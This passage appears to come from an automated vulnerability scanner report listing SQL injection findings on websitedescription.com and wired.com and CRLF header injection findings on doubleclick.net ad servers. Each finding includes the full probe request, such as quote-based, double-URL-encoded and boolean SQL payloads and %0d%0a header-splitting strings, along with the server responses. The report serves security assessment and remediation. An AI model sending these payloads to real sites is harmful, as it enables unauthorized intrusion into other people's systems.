The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /msn.whitepages.com' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 20123

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com'' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29736

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.7. http://www.websitedescription.com/msn.whitepages.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /msn.whitepages.com?1'=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 14020

<br />
<b>Warning</b>: Invalid argument supplied for foreach() in <b>/home/websited/public_html/libraries/Bing/BingData.php</b> on line <b>25</b><br />
<?php include 'include.php'; ?>

<!DOCTYPE html
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND is_approved = '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com?1''=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 23460

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.8. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/login?1%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache/2.0.52 (Red Hat)
Content-Length: 403
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /user/login?1%2527%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login?1%2527%2527=1
Content-Length: 87
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:33:10 GMT
Connection: close
Set-Cookie: JSESSIONID=acbgrU5qBQJolc2__261s; path=/

The URL has moved <a href="https://secure.wired.com/user/login?1%2527%2527=1">here</a>

1.9. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /video/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 15:25:26 GMT
Date: Wed, 12 Jan 2011 15:20:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_672363149001_Honda-Corp-Featured-Video-80x60.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001">Into the Unknown</a></li>
        <li class="videoDesc">What drives humans to explore? Is the human brain an uncharted frontier unto itself? Join the inquisitive minds at Honda and journey into the unknown with climbers, divers, scientists, astronauts, engineers and other modern-day explorers.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>







var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";


















































...[SNIP]...

Request 2

GET /video/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=292
Expires: Wed, 12 Jan 2011 15:25:37 GMT
Date: Wed, 12 Jan 2011 15:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_719323216001_IBM-WATSON-T.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001">IBM and the Jeopardy! Challenge</a></li>
        <li class="videoDesc">An IBM supercomputer named Watson will compete against Jeopardy! champions Ken Jennings and Brad Rutter this February. Watch the trailer.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>







var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

















































var bc_gBaseURL = "http://www.wired.com/video/";
var bc_gTitl
...[SNIP]...

2. HTTP header injection  previous  next
There are 20 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93020%0d%0acc1771f935d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93020%0d%0acc1771f935d;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613? HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93020
cc1771f935d
;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613:
Date: Wed, 12 Jan 2011 03:04:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload fba57%0d%0a1bd6f7ca3f9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57%0d%0a1bd6f7ca3f9=1 HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57
1bd6f7ca3f9
=1&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:19 GMT
Server: GFE/2.0
Content-Type: text/html


2.3. http://ad.doubleclick.net/activity [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 7bb44%0d%0a6d1fe61d04d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44%0d%0a6d1fe61d04d HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44
6d1fe61d04d
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:03 GMT
Server: GFE/2.0
Content-Type: text/html


2.4. http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d140%0d%0a9de548d54f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d140%0d%0a9de548d54f/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d140
9de548d54f
/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28b5e%0d%0af9bfe52e968 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28b5e%0d%0af9bfe52e968/wiredcom.dart/threatlevel;sz=728x90;tile=1;dcopt=ist;kw=01;kw=2011;kw=blogs;kw=threatlevel;kw=top;kw=wikileaks-sunken-treasure;!c=top;ord=3553839230444282.5; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/28b5e
f9bfe52e968
/wiredcom.dart/threatlevel%3Bsz%3D728x90%3Btile%3D1%3Bdcopt%3Dist%3Bkw%3D01%3Bkw%3D2011%3Bkw%3Dblogs%3Bkw%3Dthreatlevel%3Bkw%3Dtop%3Bkw%3Dwikileaks-sunken-treasure%3B%21c%3Dtop%3Bord%3D3553839230444282.5%3B:
Date: Wed, 12 Jan 2011 03:03:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c041%0d%0a26bb86d7910 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c041%0d%0a26bb86d7910/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c041
26bb86d7910
/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /ad/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14c3a%0d%0adfa9ca18363 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14c3a%0d%0adfa9ca18363/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14c3a
dfa9ca18363
/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:23:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 645ec%0d%0a4b755942ebf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /645ec%0d%0a4b755942ebf/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/645ec
4b755942ebf
/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:03:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6ff1d%0d%0af780d4232ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6ff1d%0d%0af780d4232ac/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6ff1d
f780d4232ac
/reg.security.4159/front%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3Bpos%3Dtop%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D67176:
Date: Wed, 12 Jan 2011 03:03:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.uk.doubleclick.net/imp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /imp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39898%0d%0a43e3dfa8798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39898%0d%0a43e3dfa8798;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1;;~okv=;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;~cs=s%3fhttp://regmedia.co.uk/2007/09/13/tp.gif HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39898
43e3dfa8798
;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1%3B%3B%7Eokv%3D%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3B:
Date: Wed, 12 Jan 2011 03:03:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /jump/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7941d%0d%0a560604139b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7941d%0d%0a560604139b0/reg.misc.4159/textlink HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7941d
560604139b0
/reg.misc.4159/textlink:
Date: Wed, 12 Jan 2011 03:22:20 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /jump/reg.security.4159/front

Issue detail

